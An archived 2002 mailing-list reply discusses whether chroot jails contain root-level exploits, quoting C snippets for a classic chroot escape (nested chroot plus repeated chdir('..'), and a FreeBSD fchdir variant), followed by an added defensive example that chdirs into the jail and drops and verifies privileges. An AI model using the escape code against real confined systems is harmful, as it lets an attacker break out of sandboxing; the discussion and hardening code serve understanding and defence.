Re: OT? Are chroots immune to buffer overflows?

From: Nelson Sampaio Araujo Junior (nelsonat_private)
Date: Fri May 24 2002 - 06:04:15 PDT

    Hi,
    
    > But If you are able to run code as root, a few syscalls are still available to you :
    > inserting modules and ptrace().
    
    > If you're able to run code as root, all you need, in most Un*x systems,
    > is:
    > mkdir("blah");
    > chroot("blah");
    > chdir("../../../../../../");
    > chroot(".");
    > execl("/bin/bash", "bash", NULL);
    
    > On others Un*x systems, like some BSDs, an implicit chdir(".") is always
    > made after a chroot, so this doesn't work, but you can still do mknod(2),
    > mount(2), etc..
    
    To start working and prevent this "bug" :) in FreeBSD you can do the following:
    
    mkdir("blah");
    f = fopen("./afile", "w+");
    chroot("blah");
    fchdir(f);                                    /* this will prevent the "bug" */
    for(int i=0; i<10000; i++)
      chdir("..");
    chroot(".");
    
    Of course, you can enhance the above code to be more efficient just
    by checking the chdir result.
    
    Regards,
    Nelson Junior
    nelsonat_private
    
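The defensive counterpart to the escapes discussed in this thread, added here as an example (not code from the thread or its authors): every variant quoted above needs root inside the jail to call chroot(2), fchdir(2), mknod(2) or mount(2), so the confining program must chdir("/") after chroot and then drop root and verify the drop. The function names and the /var/empty, 65534 values are hypothetical.

```c
/* Added example, not code from the thread: the defensive counterpart to the
 * quoted escapes. chroot(2) confines only a process that can no longer call
 * chroot/fchdir/mknod/mount with privilege, so enter the jail, chdir("/"),
 * drop root, and verify the drop. Function names are hypothetical. */
#define _DEFAULT_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 if this process can no longer regain root: euid is non-zero and
 * setuid(0) is refused (a success would mean the saved uid is still 0). */
int privilege_drop_verified(void)
{
    if (geteuid() == 0 || setuid(0) == 0)
        return 0;
    return errno == EPERM;
}

/* chroot, then chdir("/") so the cwd is inside the new root (the quoted
 * escape depends on a cwd or directory fd left outside it), then drop
 * supplementary groups, gid and uid. Returns 0 on success, -1 with errno. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (chroot(dir) != 0 || chdir("/") != 0)
        return -1;
    if (setgroups(0, NULL) != 0)        /* before setuid: needs root */
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (!privilege_drop_verified()) {    /* don't trust return codes alone */
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Constructed values: jail into /var/empty as uid/gid 65534 (nobody). */
    if (enter_jail("/var/empty", 65534, 65534) != 0) {
        perror("enter_jail");            /* EPERM unless started as root */
        return 1;
    }
    puts("confined and unprivileged");
    return 0;
}
```

Run as root the program ends up in the jail with no way back to uid 0; run unprivileged, chroot(2) itself is refused with EPERM, which is the whole reason the quoted escapes need root in the first place.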



    This archive was generated by hypermail 2b30 : Fri May 24 2002 - 17:24:33 PDT